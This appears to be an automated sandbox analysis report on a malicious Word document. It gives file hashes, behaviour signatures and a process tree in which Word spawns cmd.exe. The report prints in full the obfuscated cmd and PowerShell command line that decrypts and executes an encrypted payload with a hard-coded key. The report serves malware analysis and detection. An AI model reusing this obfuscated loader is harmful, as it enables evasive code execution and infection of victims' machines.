Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    25-05-2024 13:09

General

  • Target

    721022c9d4f56e90131944c67274f513_JaffaCakes118.doc

  • Size

    187KB

  • MD5

    721022c9d4f56e90131944c67274f513

  • SHA1

    a00fb4a6b7bdfe6f689d498224c5bf7ae954c96c

  • SHA256

    8e42b9382c2a81f0bd0632bf02438e5ccdfd6bf7f7d729d61bbeb1ffcf248895

  • SHA512

    2e31e191da795413a22997de733f2d1b8eddb3c1e96eea3b8ab12ee189cd1de14335661ebf3feff8646e888568fd8b9c8ea8d3fb7d8cb5700c20a415caafd5f3

  • SSDEEP

    3072:LNn/iKFzr/aaHUX7yrJVTot5Swp+VCpx4k3+v:LN/iQXaaHUX+rjTotvoVa3+v

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\721022c9d4f56e90131944c67274f513_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2924
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2548
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" apRbHrO EDHKZhizWwzfbiXhDYoTSzLT IIqwNqsjaWqf & %C^om^S^pEc% %C^om^S^pEc% /V /c set %qSKqZwGasVPLAjE%=mYSBOWwfLFAOv&&set %ZFJjsqCNFzjUTZ%=p&&set %CQFswJPFuKz%=ow&&set %mNsVdcoFqUDskdE%=VSvEcjcq&&set %iZIRGWMKmMNiTh%=!%ZFJjsqCNFzjUTZ%!&&set %vETUfiTwsfFHWqW%=PmvDOId&&set %wUuTGGAzLdENi%=er&&set %IMHbLklGnQWW%=!%CQFswJPFuKz%!&&set %BYmEZDNYMcNku%=s&&set %stXpmEJSClCZYIU%=LAFAFYwkfwr&&set %KzPWuzEtLfcOS%=he&&set %RYMrNHHqSqk%=ll&&!%iZIRGWMKmMNiTh%!!%IMHbLklGnQWW%!!%wUuTGGAzLdENi%!!%BYmEZDNYMcNku%!!%KzPWuzEtLfcOS%!!%RYMrNHHqSqk%! "& ((GET-vaRIable '*MDR*').NaME[3,11,2]-joIn'') ( ( [rUNTimE.iNtEROPSeRVIcES.mARshal]::PTrTosTrINgUni([RunTIMe.INTeRopservIces.MarshAL]::SecUrEsTRIngtogLobaLaLlocUNiCoDe($('76492d1116743f0423413b16050a5345MgB8AHoARABQAEkARgBZAEIAawBmAGcARgBLAFYAawB1AHIAcwBPAFMAWgBRAEEAPQA9AHwAZAAzADUAYwBhADEAMgAxAGYAYgA1AGQAZAA4ADkAOQAzADgAYgBhAGYAZQBlADUAOQBiAGYAZgA0AGQAMQAyAGEAMgA0ADMAMQAwADcAZAA2ADAAYwBlAGIAMwAxAGQAOAAxAGEAOQAxAGEAZgAxADYANAA2ADMAYQA5AGQAZAAzADkAZgAxADUAMAA2ADQANQA2ADYANQA4AGQAZAA4ADkAZQBlAGMANgBmADYAYQA1AGIAOAA0AGMAMABlAGMANQA0ADAAZQAxADkAOABjADUAZgA5AGQANgBmADEANgAxADgAOAA4AGMAYwBlAGMANQA4ADcAOQBiAGUAZgAzADkANQA3ADkAMABkAGMAMAA1ADgAZABhAGIAOAAwAGUAZAAxADMANAAzADgANwAzADcANAA3AGMAZQA2AGYAMQBiADAAOABiADIAMgAzADgAYQA3ADcANAA5AGUAMwBiADYANABjAGUAYwAwADkAZAA1ADEAMAA3AGIAZABhAGMAYwA4ADUAZAAyADkAZgA3ADQANQBmAGYAMQBmAGYAOQAzAGYAYgAxADAAMQAxADUAMQBmADUAMgA0AGYAMAA5ADUAYQAxAGYAZAA5ADMANABjADkAOQBhADEANgA2AGMANQA3ADcAZQA0ADcAMgAxADEANAAyADcAZgA1AGYAZgA2AGMAOQBjAGEAYQAyAGEAZQBjADgANgBkADYAMwAzAGEAZQBhADcAMgBlADgAYgAxADUAZQA5ADAAMgA2ADIANgBiADIAMwBiADQAYQA2AGMANABjADAAZQBjADgANQAwADQANgBmADEAOAAxADcAMAAxAGEAMgAwAGEAZgA2ADgAOQBkADAAMQA4ADYANABhADQANgBhAGYAMABmAGEAZAAxAGQAMgA2ADAAZABlADAANgBkAGQAOQBiADMAMwBkADkANABlADIAZAAzAGIAZABjADAAYwAyADYAYQBlADgAYwBjAGEAMAAwADQAYwBlAGUAMwAwAGEAYgAwAGUAMQA4AGIAMQBlADYAZAA4AGYANwAwADAAOAA1AGUAMQAyADUAZAAyADIAOAA4ADMAMgAxAGYAMwAyADgAYgA5ADAANABmADIAZQAxADgAZgA1AGUAYwA2AGUAOAA1ADgAYwAyADUAOQAwADQAZAAwADUAYQAyADUAYQBkAGIAZgA1AGEANQBjAGQANAA1ADgAZQBlAGIANwA3ADMAMQA5AGQAMQA1AGYAZAAxADIAYwBmAGIAMgA2ADAAZgAwAGYAYQAxADUANgA2ADQAOAA2ADQAMABmADAANgA5AGEAOAAxAGMAZAAzADcAYgBlAGYAYwA3AGYANQA1ADgAOQA5ADUAYQAxADcAYwA4AGMAYQA3AGEAMgBjAGIANQBmAGEAOABmADQAYwBmADAAZgA0ADMAMAA5ADIANQBiADUAZABlAGYAMgBkADgAZgA4AGUAMwBmADgAYgBhADEAYgAyADgAMAA3AGEAMwA1ADIAZgA1ADIAMAAwAGQANgA2ADgAYgBhAGYANAAwADMAYQBlADYANwA4ADgAYQA1ADMANQA2ADkAYwAxADUAZABkADQAMgA5ADkAMAA4ADgAOABiADUAOAAzAGIANAAyADcANwBkADcAYgAwADMAMABiAGYAYwAwADkAZgA3ADgAZQAwADEANQA5AGIAZQBjAGEAOQA2AGEAYwA0ADUAYQBlAGUANQAzAGQAYwA3ADkAOQAzADEANAA0AGYAMAA0ADYAYwAxAGMAMgA3ADMANwBmADMAYQA5ADYAMwA0ADkAMwA5AGEAMQA3ADMAYQBlAGYAZQAyADUAYwBkADIANwA4ADQAYgBmADYAZABmADMAOQBmADIAOQAzADQAYwA0AGMAYgBjAGMAOAA1ADEAYgA3ADQAYQAzAGIAYgAzADkAZQA0ADkAOQBiAGIAYQA0AGMAMgBmADAAYgBhAGMAOQA2ADQAZABiADEAMgA2ADkAOAAyADAAYQA1ADAAYQBmADIAMwBiADIAZQBiAGEAYwA3ADIANAA0AGIAZgA1ADgANgBmADUANgAxADQAMgA5ADcAYwBkADUAZgAyADAAYQA1AGYANQBiAGUAMQAwADgAOABmADcANwBiADEAMwBkAGUANgBkADgAMAA2AGIAYQA1ADUAZQAwADMAZQBmADkAZAAwAGQANwA4AGYANgA5ADkAYwBlADYAOAA0ADUANQA4ADcANwBhAGEAMQA5AGYAMQAxADAAOQBjADkAYwA5AGEAOQA2ADcAMwA0ADUAZgBlAGIAOABjADAANgBmADcAZQA1ADgAMABmADgAOQAxAGYAMgBhADcANwBmADcANgA1ADYAYwAzADIAZgA0AGMAOAA0AGMAYwA4ADYAZABjADMAZQAxAGUAMAAyADIAYgAwADQAZAA3ADAAYgBhADcANAA2ADEAMABjADYAYwA3ADAANAA2ADQAYwBhADMAMAA0AGEANwBmAGEAYQBkADMAMQBkADUAZAAyAGEAMwBiADQAOQBiAGMAOQBkADkAYwA5ADQANwA2AGUAZQBhADIAOQBhADYANwBhAGMAYQAxADcAMABmADcAZgAyAGMAMQA3AGYAMwAxADkAZAA0AGEAYwAxADgAMgAxAGMAZQA5ADIAYwA3ADkANgBhADUAOAAwAGQANwBkADIAZQAzAGEANgBhADUANgAxADkAZgBkADQAOAA2ADEAMABlADYANwBhAGEANwBiADQAOQBhADEANwA5ADQANgA1AGUAZQBjAGQAYgBjADIAMABkAGEAZQBjAGIANgBmADkAMwA0ADQAZABjADEAZQA3ADMAOQBiAGUAMgBlADIANwA4ADkAZQA4ADQAMwAzADYAMQA5ADkAZQA5AGUAZQA5AGYAZQBkADMAOAA4AGMAMABhADYAYQBhAGEAYwAyADgAYgAwADQAMABkAGYANgA1AGUAMABkADkAMAA5AGUAYQBkAGMAOAAzADQAMwA2AGIANQA4AGIAMgBjADIAZgAyADMAMAA0ADMAMQBlAGQANQBlADQAZgAyADkAOQAzADEAZQBhADUANgBjAGEAYQAyAGEAYQAzAGEAMAA2AGEANwBkADIANQBjAGEAYgA0AGMAOABmAGIAYwA4ADQAMgBiADEAMgBkAGQANwA5ADAAYgA1ADMAMgBkAGQAYwAyAGQAMwA2ADMAMQBkAGUAMwBmADcAZABhADMANgA4AGMAZgA2ADMAMgBkADYAZgAzAGEAMgBjAGUANwA3ADIAMgBjADEAYQAwAGQAOQBjADEAMQA4ADYAOQBlADMANAA2AGYANwA4ADkANwBhADMAYgAzAGUAZABjADkAYwAwADUAMAA5ADgAMwAyADUAZgA0ADYANABhADYAYgAxAGEAYwAzADAAYwBmADQAZgBmADMAMABlADkANgA4ADkANABiAGUANABmADcAMwAwADAAMQBhADEAOAA5AGYAOQAwAGUAMAAxADkAMgA2ADEANAA3ADQANQAwADAANABlADYAYQBlADUANAA1ADQAZgA2AGYANwAxADYAMgA3AGEAOQA5ADEANgBhAGIAYQAzAGYAMwBiADIAMwA4ADkAYQBlAGMAMQA0ADEAYwA2AGQANgBiADkAMwA0ADkAZQA0ADEAMwA2ADcANAA2ADcAZAA3ADYAMgA4ADQAYQAyAGIANwAxAGQAMwA4ADMAMgA1AGUAZQBhADMAZAA0AGEAYgA4AGIAMwAxAGMAYwAwADMAMgBkADUAMQBlADUANwA2AGUAMwA0ADQANgBhADYAZABmADQANAA2ADUAYwBlADkANgBjAGIAOQBhADAAYwA3ADIAMQBhAGIAZAA2ADAANQA2AGQAZQAwAGIAYgAyADEANwAxAGMANQBkADUAMABiAGYAZgAyADgAMQBlADIAYwBkADEAYgA2AGMANABkAGEANwBjAGYAZABiADcAMQAzADUANgAyADEAMgAzADIANwA5ADIAOQA3AGUAYwBjADYAYwAwAGUAMwAwADQAMgBmADQANwA1ADMAYgA4AGIAOAAxADgAYQAyAGUANwAxADMAOQBkAGEANwAyAGIAMwA5ADkAMwA4ADcAOQA4AGMAMAA1AGIAOQAxADQAMQAxADQANQBkAGEAOQAzADcAMAA0AA==' | ConvERtTO-seCUresTRInG -kEy 235,141,10,115,253,223,40,208,200,207,56,80,97,178,217,1,219,168,233,93,195,61,84,222,48,18,135,157,195,85,87,106) ))))
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2600
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "& ((GET-vaRIable '*MDR*').NaME[3,11,2]-joIn'') ( ( [rUNTimE.iNtEROPSeRVIcES.mARshal]::PTrTosTrINgUni([RunTIMe.INTeRopservIces.MarshAL]::SecUrEsTRIngtogLobaLaLlocUNiCoDe($('76492d1116743f0423413b16050a5345MgB8AHoARABQAEkARgBZAEIAawBmAGcARgBLAFYAawB1AHIAcwBPAFMAWgBRAEEAPQA9AHwAZAAzADUAYwBhADEAMgAxAGYAYgA1AGQAZAA4ADkAOQAzADgAYgBhAGYAZQBlADUAOQBiAGYAZgA0AGQAMQAyAGEAMgA0ADMAMQAwADcAZAA2ADAAYwBlAGIAMwAxAGQAOAAxAGEAOQAxAGEAZgAxADYANAA2ADMAYQA5AGQAZAAzADkAZgAxADUAMAA2ADQANQA2ADYANQA4AGQAZAA4ADkAZQBlAGMANgBmADYAYQA1AGIAOAA0AGMAMABlAGMANQA0ADAAZQAxADkAOABjADUAZgA5AGQANgBmADEANgAxADgAOAA4AGMAYwBlAGMANQA4ADcAOQBiAGUAZgAzADkANQA3ADkAMABkAGMAMAA1ADgAZABhAGIAOAAwAGUAZAAxADMANAAzADgANwAzADcANAA3AGMAZQA2AGYAMQBiADAAOABiADIAMgAzADgAYQA3ADcANAA5AGUAMwBiADYANABjAGUAYwAwADkAZAA1ADEAMAA3AGIAZABhAGMAYwA4ADUAZAAyADkAZgA3ADQANQBmAGYAMQBmAGYAOQAzAGYAYgAxADAAMQAxADUAMQBmADUAMgA0AGYAMAA5ADUAYQAxAGYAZAA5ADMANABjADkAOQBhADEANgA2AGMANQA3ADcAZQA0ADcAMgAxADEANAAyADcAZgA1AGYAZgA2AGMAOQBjAGEAYQAyAGEAZQBjADgANgBkADYAMwAzAGEAZQBhADcAMgBlADgAYgAxADUAZQA5ADAAMgA2ADIANgBiADIAMwBiADQAYQA2AGMANABjADAAZQBjADgANQAwADQANgBmADEAOAAxADcAMAAxAGEAMgAwAGEAZgA2ADgAOQBkADAAMQA4ADYANABhADQANgBhAGYAMABmAGEAZAAxAGQAMgA2ADAAZABlADAANgBkAGQAOQBiADMAMwBkADkANABlADIAZAAzAGIAZABjADAAYwAyADYAYQBlADgAYwBjAGEAMAAwADQAYwBlAGUAMwAwAGEAYgAwAGUAMQA4AGIAMQBlADYAZAA4AGYANwAwADAAOAA1AGUAMQAyADUAZAAyADIAOAA4ADMAMgAxAGYAMwAyADgAYgA5ADAANABmADIAZQAxADgAZgA1AGUAYwA2AGUAOAA1ADgAYwAyADUAOQAwADQAZAAwADUAYQAyADUAYQBkAGIAZgA1AGEANQBjAGQANAA1ADgAZQBlAGIANwA3ADMAMQA5AGQAMQA1AGYAZAAxADIAYwBmAGIAMgA2ADAAZgAwAGYAYQAxADUANgA2ADQAOAA2ADQAMABmADAANgA5AGEAOAAxAGMAZAAzADcAYgBlAGYAYwA3AGYANQA1ADgAOQA5ADUAYQAxADcAYwA4AGMAYQA3AGEAMgBjAGIANQBmAGEAOABmADQAYwBmADAAZgA0ADMAMAA5ADIANQBiADUAZABlAGYAMgBkADgAZgA4AGUAMwBmADgAYgBhADEAYgAyADgAMAA3AGEAMwA1ADIAZgA1ADIAMAAwAGQANgA2ADgAYgBhAGYANAAwADMAYQBlADYANwA4ADgAYQA1ADMANQA2ADkAYwAxADUAZABkADQAMgA5ADkAMAA4ADgAOABiADUAOAAzAGIANAAyADcANwBkADcAYgAwADMAMABiAGYAYwAwADkAZgA3ADgAZQAwADEANQA5AGIAZQBjAGEAOQA2AGEAYwA0ADUAYQBlAGUANQAzAGQAYwA3ADkAOQAzADEANAA0AGYAMAA0ADYAYwAxAGMAMgA3ADMANwBmADMAYQA5ADYAMwA0ADkAMwA5AGEAMQA3ADMAYQBlAGYAZQAyADUAYwBkADIANwA4ADQAYgBmADYAZABmADMAOQBmADIAOQAzADQAYwA0AGMAYgBjAGMAOAA1ADEAYgA3ADQAYQAzAGIAYgAzADkAZQA0ADkAOQBiAGIAYQA0AGMAMgBmADAAYgBhAGMAOQA2ADQAZABiADEAMgA2ADkAOAAyADAAYQA1ADAAYQBmADIAMwBiADIAZQBiAGEAYwA3ADIANAA0AGIAZgA1ADgANgBmADUANgAxADQAMgA5ADcAYwBkADUAZgAyADAAYQA1AGYANQBiAGUAMQAwADgAOABmADcANwBiADEAMwBkAGUANgBkADgAMAA2AGIAYQA1ADUAZQAwADMAZQBmADkAZAAwAGQANwA4AGYANgA5ADkAYwBlADYAOAA0ADUANQA4ADcANwBhAGEAMQA5AGYAMQAxADAAOQBjADkAYwA5AGEAOQA2ADcAMwA0ADUAZgBlAGIAOABjADAANgBmADcAZQA1ADgAMABmADgAOQAxAGYAMgBhADcANwBmADcANgA1ADYAYwAzADIAZgA0AGMAOAA0AGMAYwA4ADYAZABjADMAZQAxAGUAMAAyADIAYgAwADQAZAA3ADAAYgBhADcANAA2ADEAMABjADYAYwA3ADAANAA2ADQAYwBhADMAMAA0AGEANwBmAGEAYQBkADMAMQBkADUAZAAyAGEAMwBiADQAOQBiAGMAOQBkADkAYwA5ADQANwA2AGUAZQBhADIAOQBhADYANwBhAGMAYQAxADcAMABmADcAZgAyAGMAMQA3AGYAMwAxADkAZAA0AGEAYwAxADgAMgAxAGMAZQA5ADIAYwA3ADkANgBhADUAOAAwAGQANwBkADIAZQAzAGEANgBhADUANgAxADkAZgBkADQAOAA2ADEAMABlADYANwBhAGEANwBiADQAOQBhADEANwA5ADQANgA1AGUAZQBjAGQAYgBjADIAMABkAGEAZQBjAGIANgBmADkAMwA0ADQAZABjADEAZQA3ADMAOQBiAGUAMgBlADIANwA4ADkAZQA4ADQAMwAzADYAMQA5ADkAZQA5AGUAZQA5AGYAZQBkADMAOAA4AGMAMABhADYAYQBhAGEAYwAyADgAYgAwADQAMABkAGYANgA1AGUAMABkADkAMAA5AGUAYQBkAGMAOAAzADQAMwA2AGIANQA4AGIAMgBjADIAZgAyADMAMAA0ADMAMQBlAGQANQBlADQAZgAyADkAOQAzADEAZQBhADUANgBjAGEAYQAyAGEAYQAzAGEAMAA2AGEANwBkADIANQBjAGEAYgA0AGMAOABmAGIAYwA4ADQAMgBiADEAMgBkAGQANwA5ADAAYgA1ADMAMgBkAGQAYwAyAGQAMwA2ADMAMQBkAGUAMwBmADcAZABhADMANgA4AGMAZgA2ADMAMgBkADYAZgAzAGEAMgBjAGUANwA3ADIAMgBjADEAYQAwAGQAOQBjADEAMQA4ADYAOQBlADMANAA2AGYANwA4ADkANwBhADMAYgAzAGUAZABjADkAYwAwADUAMAA5ADgAMwAyADUAZgA0ADYANABhADYAYgAxAGEAYwAzADAAYwBmADQAZgBmADMAMABlADkANgA4ADkANABiAGUANABmADcAMwAwADAAMQBhADEAOAA5AGYAOQAwAGUAMAAxADkAMgA2ADEANAA3ADQANQAwADAANABlADYAYQBlADUANAA1ADQAZgA2AGYANwAxADYAMgA3AGEAOQA5ADEANgBhAGIAYQAzAGYAMwBiADIAMwA4ADkAYQBlAGMAMQA0ADEAYwA2AGQANgBiADkAMwA0ADkAZQA0ADEAMwA2ADcANAA2ADcAZAA3ADYAMgA4ADQAYQAyAGIANwAxAGQAMwA4ADMAMgA1AGUAZQBhADMAZAA0AGEAYgA4AGIAMwAxAGMAYwAwADMAMgBkADUAMQBlADUANwA2AGUAMwA0ADQANgBhADYAZABmADQANAA2ADUAYwBlADkANgBjAGIAOQBhADAAYwA3ADIAMQBhAGIAZAA2ADAANQA2AGQAZQAwAGIAYgAyADEANwAxAGMANQBkADUAMABiAGYAZgAyADgAMQBlADIAYwBkADEAYgA2AGMANABkAGEANwBjAGYAZABiADcAMQAzADUANgAyADEAMgAzADIANwA5ADIAOQA3AGUAYwBjADYAYwAwAGUAMwAwADQAMgBmADQANwA1ADMAYgA4AGIAOAAxADgAYQAyAGUANwAxADMAOQBkAGEANwAyAGIAMwA5ADkAMwA4ADcAOQA4AGMAMAA1AGIAOQAxADQAMQAxADQANQBkAGEAOQAzADcAMAA0AA==' | ConvERtTO-seCUresTRInG -kEy 235,141,10,115,253,223,40,208,200,207,56,80,97,178,217,1,219,168,233,93,195,61,84,222,48,18,135,157,195,85,87,106) ))))
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2476

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      2cf1a59307f88cf12d97a85a95a30dc2

      SHA1

      2cb4aa477b3d8ca993a5fb3bfb611c5851a3882a

      SHA256

      06cb8a6ee5e31c929283b21478253b8a0e91413ee12b7ba5575878d2d56292c2

      SHA512

      6b29c8725c73764700255a4d2e8d32ef405e1bed36630895d09c2e04ec9baf08dbf1a124d6a9f208863cec8af11b119487af92cf2298e2e84f5f95f954f239d0

    • memory/2476-35-0x0000000005790000-0x00000000057EB000-memory.dmp

      Filesize

      364KB

    • memory/2476-36-0x0000000004F40000-0x0000000004F57000-memory.dmp

      Filesize

      92KB

    • memory/2924-17-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2924-12-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2924-15-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2924-0-0x000000002F3D1000-0x000000002F3D2000-memory.dmp

      Filesize

      4KB

    • memory/2924-25-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2924-24-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2924-26-0x00000000068E0000-0x00000000069E0000-memory.dmp

      Filesize

      1024KB

    • memory/2924-28-0x00000000068E0000-0x00000000069E0000-memory.dmp

      Filesize

      1024KB

    • memory/2924-23-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2924-20-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2924-8-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2924-13-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2924-10-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2924-7-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2924-6-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2924-2-0x000000007167D000-0x0000000071688000-memory.dmp

      Filesize

      44KB

    • memory/2924-37-0x000000007167D000-0x0000000071688000-memory.dmp

      Filesize

      44KB

    • memory/2924-38-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2924-39-0x00000000068E0000-0x00000000069E0000-memory.dmp

      Filesize

      1024KB

    • memory/2924-40-0x00000000068E0000-0x00000000069E0000-memory.dmp

      Filesize

      1024KB

    • memory/2924-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2924-55-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2924-56-0x000000007167D000-0x0000000071688000-memory.dmp

      Filesize

      44KB